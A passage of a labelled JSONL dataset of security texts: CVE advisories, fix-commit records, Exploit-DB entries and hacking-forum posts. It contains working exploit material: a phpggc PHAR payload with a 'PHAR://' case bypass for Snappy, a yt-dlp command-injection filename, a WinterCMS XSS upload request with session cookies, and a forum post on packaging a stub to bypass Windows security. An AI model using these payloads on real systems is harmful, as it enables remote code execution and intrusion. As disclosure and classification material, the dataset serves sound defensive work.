vulnerability [CVE-2023-28115 was disclosed](https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc), allowing an attacker to gain remote code execution through PHAR deserialization. To fix this issue, the version 1.4.2 was released with an additional check in the affected function to prevent the usage of the `phar://` wrapper. However, because PHP wrappers are case-insensitive and the patch only checks the presence of the `phar://` string, it can be bypassed to achieve remote code execution again using a different case.\n\nAs for the initial vulnerability, PHP 7 or below is required for a successful exploitation using the deserialization of PHP archives metadata via the `phar://` wrapper.\n\n## Technical details\n\n### Description\n\nThe following [patch](https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6) was committed on the 1.4.2 release to fix CVE-2023-28115.\n\n![patch](https://user-images.githubusercontent.com/110113034/250088710-396f562d-d19e-43a5-a8f8-90ca1f7e3e98.png)\n\nIf the user is able to control the second parameter of the `generateFromHtml()` function of Snappy, it will then be passed as the `$filename` parameter in the `prepareOutput()` function. In the original vulnerability, a file name with a `phar://` wrapper could be sent to the `fileExists()` function, equivalent to the `file_exists()` PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files.\n\nTo fix this issue, the string is now passed to the `strpos()` function and if it starts with `phar://`, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed using `PHAR://` instead of `phar://`.\n\n### Proof of Concept\n\nTo illustrate the vulnerability, the `/tmp/exploit` file will be written to the filesystem using a voluntarily added library to trigger the deserialization. The PHP archive is generated using [phpggc](https://github.com/ambionics/phpggc) with the `-f` option to force a fast destruct on the object. Otherwise, the PHP flow will stop on the first exception and the object destruction will not be called.\n\n```bash\n$ phpggc -f Monolog/RCE1 exec 'touch /tmp/exploit' -p phar -o exploit.phar\n```\nThe following `index.php` file will be used to trigger the vulnerability via the payload `PHAR://exploit.phar`.\n\n```bash\ngenerateFromHtml('

    POC

    ', 'PHAR://exploit.phar');\n```\nFinally once executed, the `/tmp/exploit` file is successfully created on the filesystem.\n\n```bash\n$ php index.php \nFatal error: Uncaught InvalidArgumentException: The output file 'PHAR://exploit.phar' already exists and it is a directory. in /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php:634\nStack trace:\n#0 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php(178): Knp\\Snappy\\AbstractGenerator->prepareOutput('PHAR://exploit.phar', false)\n#1 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/Pdf.php(36): Knp\\Snappy\\AbstractGenerator->generate(Array, 'PHAR://exploit.phar', Array, false)\n#2 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php(232): Knp\\Snappy\\Pdf->generate(Array, 'PHAR://exploit.phar', Array, false)\n#3 /var/www/index.php(12): Knp\\Snappy\\AbstractGenerator->generateFromHtml('

    POC

    ', 'PHAR://exploit.phar')\n#4 {main}\n thrown in /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php on line 634\n \n$ ls -l /tmp/exploit\n-rw-r--r-- 1 user_exploit user_exploit 0 Jun 14 10:05 exploit\n```\n\nThis proof of concept is based on the original one published with CVE-2023-28115.\n\n### Impact\n\nA successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8.\n\n", "source": "github_advisory", "timestamp": "2023-09-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "36901abf3ed4cc6438bc", "text": "rkhunter and chkrootkit mostly use the fileExists method with hardcoded paths. The scope is to find known rootkits, which was really really old and outdated. ClamAV is the best option in here. However, it still detects known malware signatures. The best way to check backdoor inside system is check processes, network activities, file date creations, … and so many methods. It depends on threat actors and the complexity of backdoor’s design.", "source": "parrotsec", "timestamp": "2022-02-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "24f46b0522030ed45cec", "text": "Not sure what happened exactly but I can say it was not caused by “scanning your network with wireshark”. Wireshark is a passive collection tool. All packets that hit that interface are captured.", "source": "parrotsec", "timestamp": "2022-04-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0cca85f70d56e1fd1efb", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2022-09-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "045fd480aa94eb0b67f9", "text": "CVE: CVE-2022-25867\n\n[{'lang': 'en', 'value': 'The package io.socket:socket.io-client before 2.0.1 are vulnerable to NULL Pointer Dereference when parsing a packet with with invalid payload format.'}]\n\nFix commit: fix: ensure the payload format is valid\n\nThis commit should prevent some NPE issues encountered after the\nparsing of the packet.\n\nRelated:\n\n- https://github.com/socketio/socket.io-client-java/issues/642\n- https://github.com/socketio/socket.io-client-java/issues/609\n- https://github.com/socketio/socket.io-client-java/issues/505", "source": "cvefixes", "timestamp": "2022-08-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ce7d4ee0b4afb5dfe563", "text": "Hello everybody , I’m stuck please help. I find access.log of nginix and can read it but when i want to use User agent it don’t add log . any hint ?", "source": "hackthebox", "timestamp": "2022-09-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0288a516b5ac72fc3fa5", "text": "Improper Access Control in Apache Tomcat\n\n[Severity: MEDIUM]\n\nThe replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "67b017813202d7a282ef", "text": "Here’s a free PDF , updated for 2021. Do you already have a firm grasp of Linux?", "source": "parrotsec", "timestamp": "2022-05-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2e5e5f57fa63abf2a4dc", "text": "CVE: CVE-2022-31051\n\n[{'lang': 'en', 'value': 'semantic-release is an open source npm package for automated version management and package publishing. In affected versions secrets that would normally be masked by semantic-release can be accidentally disclosed if they contain characters that are excluded from uri encoding by `encodeURI`. Occurrence is further limited to execution contexts where push access to the related repository is not available without modifying the repository url to inject credentials. Users are advised to upgrade. Users unable to upgrade should ensure that secrets that do not contain characters that are excluded from encoding with `encodeURI` when included in a URL are already masked properly.'}]\n\nFix commit: fix(log-repo): use the original form of the repo url to remove the need to mask credentials (#2459)\n\nfixes #2449", "source": "cvefixes", "timestamp": "2022-06-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2a3e7e2c7dba65750250", "text": " yt-dlp on Windows vulnerable to `--exec` command injection when using `%q`\n\n[Severity: HIGH]\n\n### Impact\n[`yt-dlp`](https://github.com/yt-dlp/yt-dlp) allows the user to provide shell commands to be executed at various stages in its download process through the `--exec` flag. This flag allows output template expansion in its argument, so that video metadata values may be used in the shell commands. The metadata fields can be combined with the `%q` conversion, which is intended to quote/escape these values so they can be safely passed to the shell.\n\nHowever, the escaping used for `cmd` (the shell used by Python's `subprocess` on Windows) did not properly escape special characters, which can allow for remote code execution if `--exec` is used directly with maliciously crafted remote data. This vulnerability only impacts `yt-dlp` on Windows, and the vulnerability is present regardless of whether `yt-dlp` is run from `cmd` or from `PowerShell`.\n\nSupport for output template expansion in `--exec`, along with this vulnerable behavior, was added to `yt-dlp` in version [2021.04.11](https://github.com/yt-dlp/yt-dlp/releases/tag/2021.04.11).\n\n```shell\n> yt-dlp https://youtu.be/Jo66yyCpHcQ --exec \"echo %(title)q\"\n[youtube] Extracting URL: https://youtu.be/Jo66yyCpHcQ\n[youtube] Jo66yyCpHcQ: Downloading webpage\n[youtube] Jo66yyCpHcQ: Downloading ios player API JSON\n[youtube] Jo66yyCpHcQ: Downloading android player API JSON\n[youtube] Jo66yyCpHcQ: Downloading m3u8 information\n[info] Jo66yyCpHcQ: Downloading 1 format(s): 135+251\n[download] Destination: "&echo(&echo(pwned&rem( [Jo66yyCpHcQ].f135.mp4\n[download] 100% of 4.85KiB in 00:00:00 at 60.20KiB/s\n[download] Destination: "&echo(&echo(pwned&rem( [Jo66yyCpHcQ].f251.webm\n[download] 100% of 4.80KiB in 00:00:00 at 31.58KiB/s\n[Merger] Merging formats into \""&echo(&echo(pwned&rem( [Jo66yyCpHcQ].mkv\"\nDeleting original file "&echo(&echo(pwned&rem( [Jo66yyCpHcQ].f135.mp4 (pass -k to keep)\nDeleting original file "&echo(&echo(pwned&rem( [Jo66yyCpHcQ].f251.webm (pass -k to keep)\n[Exec] Executing command: echo \"\\\"&echo(&echo(pwned&rem(\"\n\"\\\"\n\npwned\n```\n\n### Patches\nyt-dlp version 2023.09.24 fixes this issue by properly escaping each special character.\n`\\n` will be replaced by `\\r`, as no way of escaping it has been found.\n\n### Workarounds\nIt is recommended to upgrade yt-dlp to version 2023.09.24 as soon as possible. Also, always be careful when using `--exec`, because while this specific vulnerability has been patched, using unvalidated input in shell commands is inherently dangerous.\n\nFor Windows users who are not able to upgrade:\n- Avoid using any output template expansion in `--exec` other than `{}` (filepath).\n- If expansion in `--exec` is needed, verify the fields you are using do not contain `\"`, `|` or `&`.\n- Instead of using `--exec`, write the info json and load the fields from it instead.\n\n### References\n- https://github.com/yt-dlp/yt-dlp/security/advisories/GHSA-42h4-v29r-42qg\n- https://nvd.nist.gov/vuln/detail/CVE-2023-40581\n- https://github.com/yt-dlp/yt-dlp/releases/tag/2023.09.24\n- https://github.com/yt-dlp/yt-dlp-nightly-builds/releases/tag/2023.09.24.003044\n- https://github.com/yt-dlp/yt-dlp/commit/de015e930747165dbb8fcd360f8775fd973b7d6e", "source": "github_advisory", "timestamp": "2023-09-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "50836f2fffc19a56aa87", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2022-02-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "03fb3165cb248fda2e53", "text": "CVE: CVE-2022-1650\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository eventsource/eventsource prior to v2.0.2.'}]\n\nFix commit: fix: strip sensitive headers on redirect to different origin", "source": "cvefixes", "timestamp": "2022-05-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "03ba91e2889b315e3733", "text": "CVE: CVE-2020-28919\n\n[{'lang': 'en', 'value': 'A stored cross site scripting (XSS) vulnerability in Checkmk 1.6.0x prior to 1.6.0p19 allows an authenticated remote attacker to inject arbitrary JavaScript via a javascript: URL in a view title.'}]\n\nFix commit: Rewrite matching a href unescape regex to separate attributes\n\nThe goal of this commit is to separate the values of the href and target\nattributes in dedicated match groups. We also exclude the quotes from the\nmatch groups to simplify the code.\n\nChange-Id: I1e64946a1a426d81284b3173db43135ee0d1debc", "source": "cvefixes", "timestamp": "2022-01-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "cc55bd93744b8a5e0b98", "text": "Prototype Pollution in deep-get-set\n\n[Severity: HIGH]\n\nAll versions of package deep-get-set are vulnerable to Prototype Pollution via the 'deep' function. **Note:** This vulnerability derives from an incomplete fix of [CVE-2020-7715](https://security.snyk.io/vuln/SNYK-JS-DEEPGETSET-598666)", "source": "github_advisory", "timestamp": "2022-06-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "fe185edf64e5f97a86ed", "text": "Agreed I could use some help here, I’m pretty confident I have the right train of thought: user-anarchy for my usernames create a custom password list using CUPP Use hydra, honestly I don’t know jack about HP but the hint says don’t get crazy with CUPP buuuuuuuuut??? When I use the two lists together is says it’s going to take several hours and the machine times out. Am I going down the right track?", "source": "hackthebox", "timestamp": "2022-02-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "5dcc60238eef47f10d5c", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge, aka \"Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8391, CVE-2018-8456, CVE-2018-8457, CVE-2018-8459.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c285e2e4702de7a4f6ee", "text": "Regarding global rank\n\nhey, i completed 2 machines in hackthebox and owned them and also completed 1 or 2 challanges why my global ranking is not increasing? its still 0", "source": "hackthebox", "timestamp": "2023-03-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "6583e6f40e4bdf3c9992", "text": "I could need help as well. I found flag 4 and upgraded my Shell to a fully interactive shell. I also checked commands I can execute with sudo without password and tried to exploit the command. Is this the right way? I did not really find useful hints from the internet.", "source": "hackthebox", "timestamp": "2022-08-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c0a115287fc6fe4c28aa", "text": "Buildbot vulnerable to cross-site scripting\n\n[Severity: MEDIUM]\n\nMultiple cross-site scripting (XSS) vulnerabilities in Buildbot 0.7.6 through 0.7.11p2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, different vulnerabilities than CVE-2009-2959.", "source": "github_advisory", "timestamp": "2022-05-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ad75b4797772a770d6d2", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nChakraCore and Windows 10 1709 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "5bfcc59494a327f4df92", "text": "CVE: CVE-2022-1723\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository jgraph/drawio prior to 18.0.6.'}]\n\nFix commit: 18.0.6 release", "source": "cvefixes", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0f326fab274a42f5bcc0", "text": "TYPO3 CMS vulnerable to Denial of Service in Page Error Handling\n\n[Severity: MEDIUM]\n\n> ### Meta\n> * CVSS: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:O/RC:C` (5.5)\n\n### Problem\nRequesting invalid or non-existing resources via HTTP triggers the page error handler which again could retrieve content to be shown as an error message from another page. This leads to a scenario in which the application is calling itself recursively - amplifying the impact of the initial attack until the limits of the web server are exceeded.\n\nThis vulnerability is the same as described in [TYPO3-CORE-SA-2021-005](https://typo3.org/security/advisory/typo3-core-sa-2021-005) ([CVE-2021-21359](https://nvd.nist.gov/vuln/detail/CVE-2021-21359)). A regression, introduced during TYPO3 v11 development, led to this situation.\n\n### Solution\nUpdate to TYPO3 version 11.5.16 that fixes the problem described above.\n\n### Credits\nThanks to Rik Willems who reported this issue and to TYPO3 core & security team member Oliver Hader who fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2022-006](https://typo3.org/security/advisory/typo3-core-sa-2022-006)", "source": "github_advisory", "timestamp": "2022-09-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c71ad44499c761e53672", "text": "CVE: CVE-2022-30767\n\n[{'lang': 'en', 'value': 'nfs_lookup_reply in net/nfs.c in Das U-Boot through 2022.04 (and through 2022.07-rc2) has an unbounded memcpy with a failed length check, leading to a buffer overflow. NOTE: this issue exists because of an incorrect fix for CVE-2019-14196.'}]\n\nFix commit: CVE-2019-14196: nfs: fix unbounded memcpy with a failed length check at nfs_lookup_reply\n\nThis patch adds a check to rpc_pkt.u.reply.data at nfs_lookup_reply.\n\nSigned-off-by: Cheng Liu \nReported-by: Fermín Serna \nAcked-by: Joe Hershberger ", "source": "cvefixes", "timestamp": "2022-05-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "58d3c45b588b06418331", "text": "Thanks @akiraowen I was stuck on this question. I followed your leads: 1). Use cupp and specify First Name, Surname and accept the question for special characters, numbers and leet mode. 2). Reduce the list of passwords with “sed” as taught in the HTB Academy module. 3). Use the tool “usernameGenerator” with “Harry Potter”. I also tried the username-anarchy tool and it worked. 4). With “hydra” the attack lasts literally 20 seconds or less.", "source": "hackthebox", "timestamp": "2022-12-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0905a81b06c64b12b91f", "text": "I am on flag5. I moved to third user with a shell from external service where it is not upgraded. So, errors reported by shell are missing. Exist any way to fix this. I guess I am inside a restricted “universe” due my filesystem is different than other users. Any hint is welcome! thanks", "source": "hackthebox", "timestamp": "2022-03-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "72e750a26781a7f7e964", "text": "[Allocation of Resources Without Limits or Throttling] CVE-2022-32206: HTTP compression denial of service\n\ncurl supports \"chained\" HTTP compression algorithms, meaning that a server response can be compressed multiple times and potentially with different algorithms. The number of acceptable \"links\" in this \"decompression chain\" was unbounded, allowing a malicious server to insert a virtually unlimited number of compression steps.\n\nThe use of such a decompression chain could result in a \"malloc bomb\", making curl end up spending enormous amounts of allocated heap memory, or trying to and returning out of memory errors.\n\n## Impact\n\nDenial of service", "source": "hackerone", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "99e3b856a27f7bec6484", "text": "If I remember correctly I brute forced for FTP but if you’re using the right wordlist it’s will not take long at all I hope this helps but I can’t remember for sure the the service i brute forced", "source": "hackthebox", "timestamp": "2022-03-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c7b3cb5c398cf442f147", "text": "Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path\n\n# Exploit Title: Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path\n# Exploit Author: Manthan Chhabra (netsectuna), Harshit (fumenoid)\n# Version: 2020.2.20328.2050\n# Date: 02/04/2022\n# Vendor Homepage: http://gimmal.com/\n# Vulnerability Type: Unquoted Service Path\n# Tested on: Windows 10\n# CVE: CVE-2022-23909\n\n\n# Step to discover Unquoted Service Path:\n\nC:\\>wmic service get name,displayname,pathname,startmode | findstr /i\n\"sherpa\" | findstr /i \"auto\" |findstr /i /v \"c:\\windows\\\\\" |findstr /i /v\n\"\"\"\n\nSherpa Connector Service\n Sherpa Connector Service C:\\Program\nFiles\\Sherpa Software\\Sherpa Connector\\SherpaConnectorService.exe\n Auto\n\nC:\\>sc qc \"Sherpa Connector Service\"\n\n[SC] QueryServiceConfig SUCCESS\n\nSERVICE_NAME: Sherpa Connector Service\n TYPE : 10 WIN32_OWN_PROCESS\n START_TYPE : 2 AUTO_START\n ERROR_CONTROL : 1 NORMAL\n BINARY_PATH_NAME : C:\\Program Files\\Sherpa Software\\Sherpa\nConnector\\SherpaConnectorService.exe\n LOAD_ORDER_GROUP :\n TAG : 0\n DISPLAY_NAME : Sherpa Connector Service\n DEPENDENCIES : wmiApSrv\n SERVICE_START_NAME : LocalSystem", "source": "exploitdb", "timestamp": "2022-04-07", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "64fe586edb7563cdf916", "text": "I found something here? gist.github.com https://gist.github.com/Bristools/7af6f8710837a5d8a3786059fce18e3a/revisions gistfile1.txt You'll need inno setup compiler and Winrar https://jrsoftware.org/isdl.php https://www.win-rar.com/start.html?&L=0 https://direct-link.net/323899/itroublve MAKE SURE TO TURN ON BYPASS WINDOWS SECURITY -------------------------------------------------- 1.)First create a stub using a stub maker of your choice. I recommend Mercurial 2.)Download inno setup compiler and create a new script file using the script wizard This file has been truncated. show original", "source": "hackersploit", "timestamp": "2022-12-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "89153b00e6c84df23de4", "text": "Locate hidden cameras and intercept video stream through router\n\nHello, I am currently facing an issue where I believe there are cameras hidden about my home. I would like some advice as to how I can: 1) Locate the cameras/ spy devices on through the router. 2) Intercept images being sent out by the cameras. (Would also help me locate them physically). 3) Find the IP that these images are being sent to. If anyone has any suggestions on programs/ methods that I could use to do this, it would be much appreciated.", "source": "go4expert", "timestamp": "2022-08-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c9a3fac0f6dd7306a476", "text": "CVE: CVE-2022-1509\n\n[{'lang': 'en', 'value': 'Sed Injection Vulnerability in GitHub repository hestiacp/hestiacp prior to 1.5.12. An authenticated remote attacker with low privileges can execute arbitrary code under root context.'}]\n\nFix commit: [Security] Patches multiple security issue (#2555)\n\n* Add missing check in is_format_valid\r\n\r\n* Add check on v-delete-dns-domain\r\n\r\n* Validate theme via is_format_valid\r\n\r\n* No need for extra code\r\n\r\n* Prevent LF command passed trough + Add test to verify\r\n\r\n* Add missing checks\r\n\r\n* Don't allow exception for localhost\r\n\r\n* Add some more missing checks\r\n\r\n* Fix to strict error validation\r\n\r\n* Add validation for user\r\n\r\n* Fix bug in main.sh\r\n\r\n* Use -d instead -f", "source": "cvefixes", "timestamp": "2022-04-28", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c6e1e70b09e063966b7c", "text": "CVE: CVE-2022-0253\n\n[{'lang': 'en', 'value': \"livehelperchat is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\"}]\n\nFix commit: Do not execute angular title", "source": "cvefixes", "timestamp": "2022-01-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "1087810edbe10c53a87f", "text": "CVE: CVE-2022-24279\n\n[{'lang': 'en', 'value': 'The package madlib-object-utils before 0.1.8 are vulnerable to Prototype Pollution via the setValue method, as it allows an attacker to merge object prototypes into it. *Note:* This vulnerability derives from an incomplete fix of [CVE-2020-7701](https://security.snyk.io/vuln/SNYK-JS-MADLIBOBJECTUTILS-598676)'}]\n\nFix commit: fix(set-value): prototype pollution", "source": "cvefixes", "timestamp": "2022-04-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "50cad7ecf7222a5397ae", "text": "Hi can anyone DM on overflown, I already have the exploit working but Im not sure where to use it.", "source": "hackthebox", "timestamp": "2022-02-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "037160c70ddc6a6ba810", "text": "CVE: CVE-2022-23598\n\n[{'lang': 'en', 'value': 'laminas-form is a package for validating and displaying simple and complex forms. When rendering validation error messages via the `formElementErrors()` view helper shipped with laminas-form, many messages will contain the submitted value. However, in laminas-form prior to version 3.1.1, the value was not being escaped for HTML contexts, which could potentially lead to a reflected cross-site scripting attack. Versions 3.1.1 and above contain a patch to mitigate the vulnerability. A workaround is available. One may manually place code at the top of a view script where one calls the `formElementErrors()` view helper. More information about this workaround is available on the GitHub Security Advisory.'}]\n\nFix commit: Merge pull request from GHSA-jq4p-mq33-w375\n\nHtml escape validation error messages", "source": "cvefixes", "timestamp": "2022-01-28", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "5c59675ab3a1c920d8ad", "text": "WinterCMS < 1.2.3 - Persistent Cross-Site Scripting\n\n# Exploit Title: WinterCMS < 1.2.3 - Persistent Cross-Site Scripting\n# Exploit Author: abhishek morla\n# Google Dork: N/A\n# Date: 2023-07-10\n# Vendor Homepage: https://wintercms.com/\n# Software Link: https://github.com/wintercms/winter\n# Version: 1.2.2\n# Tested on: windows64bit / mozila firefox\n# CVE : CVE-2023-37269\n# Report Link : https://github.com/wintercms/winter/security/advisories/GHSA-wjw2-4j7j-6gc3\n# Video POC : https://youtu.be/Dqhq8rdrcqc\n\nTitle : Application is Vulnerable to Persistent Cross-Site Scripting via SVG File Upload in Custom Logo Upload Functionality\n\nDescription :\nWinterCMS < 1.2.3 lacks restrictions on uploading SVG files as website logos, making it vulnerable to a Persistent cross-site scripting (XSS) attack. This vulnerability arises from the ability of an attacker to embed malicious JavaScript content within an SVG file, which remains visible to all users, including anonymous visitors. Consequently, any user interaction with the affected page can inadvertently trigger the execution of the malicious script\n\nPayload:-\n// image.svg\n\n\n\n \n \n\n\n//Post Request\n\nPOST /backend/system/settings/update/winter/backend/branding HTTP/1.1\nHost: 172.17.0.2\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: application/json\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCache-Control: no-cache\nX-Requested-With: XMLHttpRequest\nX-CSRF-TOKEN: fk93d30vmHCawwgMlTRy97vPOxaf4iPphtUwioc2\nX-WINTER-REQUEST-HANDLER: formLogo::onUpload\nContent-Type: multipart/form-data; boundary=---------------------------186411693022341939203410401206\nContent-Length: 608\nOrigin: http://172.17.0.2\nConnection: close\nCookie: admin_auth=eyJpdiI6IkV2dElCcWdsZStzWHc5cDVIcFZ1bnc9PSIsInZhbHVlIjoiVFkyV1k3UnBKUVNhSWF2NjVNclVCdXRwNklDQlFmenZXU2hUNi91T3c5aFRTTTR3VWQrVVJkZG5pcFZTTm1IMzFtZzkyWWpRV0FYRnJuZ1VoWXQ0Q2VUTGRScHhVcVRZdWtlSGYxa1kyZTh0RXVScFdySmF1VDZyZ1p0T1pYYWI5M1ZmVWtXUkhpeXg2U0l3NG9ZWHhnPT0iLCJtYWMiOiIyNzk0OTNlOWY2ODZhYjFhMGY0M2Y4Mzk0NjViY2FiOWQ0ZjNjMThlOTkxODZjYmFmNTZkZmY3MmZhMTM3YWJlIiwidGFnIjoiIn0%3D; BBLANG=en_US; winter_session=eyJpdiI6ImJFWHVEb0QrTmo5YjZYcml6Wm1jT3c9PSIsInZhbHVlIjoiQVdVZ3R4ajVUWUZXeS83dkhIQVFhVVYxOE1uajJQOVNzOUtwM1ZGcUFYOC9haHZFMlE2R0llNjZDWVR6eHZqbDZ5Z1J1akM5VkNaQUFZM1p5OGlZcjJFWTRaT21tRWdtcnJUUHJWRWg1QTZyRFhJbEdMc0h1SzZqaEphMFFSSDYiLCJtYWMiOiI0YzRkNWQwODVkMmI4ZmMxMTJlMGU5YjM2MWJkYjNiNjEwZmE2NTY4ZGQwYTdjNjAxMjRkMjRiN2M1NTBiOTNiIiwidGFnIjoiIn0%3D\n\n-----------------------------186411693022341939203410401206\nContent-Disposition: form-data; name=\"file_data\"; filename=\"image.svg\"\nContent-Type: image/svg+xml\n\n\n\n\n \n \n\n\n-----------------------------186411693022341939203410401206--\n\n\n\n|-----------------------------------------EOF-----------------------------------------", "source": "exploitdb", "timestamp": "2023-07-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "dfbdea7ca43d37b5d3eb", "text": "CVE: CVE-2022-21670\n\n[{'lang': 'en', 'value': 'markdown-it is a Markdown parser. Prior to version 1.3.2, special patterns with length greater than 50 thousand characterss could slow down the parser significantly. Users should upgrade to version 12.3.2 to receive a patch. There are no known workarounds aside from upgrading.'}]\n\nFix commit: Fix possible ReDOS in newline rule.\n\nCo-authored-by: MakeNowJust ", "source": "cvefixes", "timestamp": "2022-01-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "546a37a44796d2e26bff", "text": "Don't overreact mobile machine\n\nhello can anyone tell me how find flag in the overreact mobile machine flag?", "source": "hackthebox", "timestamp": "2023-05-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "31e65eb23dfa782aa3ee", "text": "try out this command it’ll work $ netstat -ln4 | grep LISTEN | grep -v 127 | wc -l", "source": "hackthebox", "timestamp": "2022-02-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0ceea414589178f60475", "text": "CVE: CVE-2022-24896\n\n[{'lang': 'en', 'value': 'Tuleap is a Free & Open Source Suite to manage software developments and collaboration. In versions prior to 13.7.99.239 Tuleap does not properly verify authorizations when displaying the content of tracker report renderer and chart widgets. Malicious users could use this vulnerability to retrieve the name of a tracker they cannot access as well as the name of the fields used in reports.'}]\n\nFix commit: request #26729 Tracker report renderer and chart widgets leak information user cannot access\n\nTracker report renderer and chart widgets leak information user cannot access\n\nChange-Id: Ibdd7d1b8e72dd44bbb2b747b7d8f264603f98024", "source": "cvefixes", "timestamp": "2022-06-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "be5e219db77a3ec7acea", "text": "CVE: CVE-2020-28471\n\n[{'lang': 'en', 'value': 'This affects the package properties-reader before 2.2.0.'}]\n\nFix commit: Test case covering the use of `__proto__` as a section name\nCloses #40", "source": "cvefixes", "timestamp": "2022-07-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "417b79b677cddee36085", "text": "TSplus 16.0.0.0 - Remote Work Insecure Files and Folders\n\n# Exploit Title: TSplus 16.0.0.0 - Remote Work Insecure Files and Folders Permissions\n# Date: 2023-08-09\n# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia\n# Vendor Homepage: https://tsplus.net/\n# Version: Up to 16.0.0.0\n# Tested on: Windows\n# CVE : CVE-2023-31068\n\nWith TSPlus Remote Work (v. 16.0.0.0) you can create a secure single\nsign-on web portal and remote desktop gateway that enables users to\nremotely access the console session of their office PC.\nThe solution comes with an embedded web server to allow remote users to\neasely connect remotely.\nHowever, 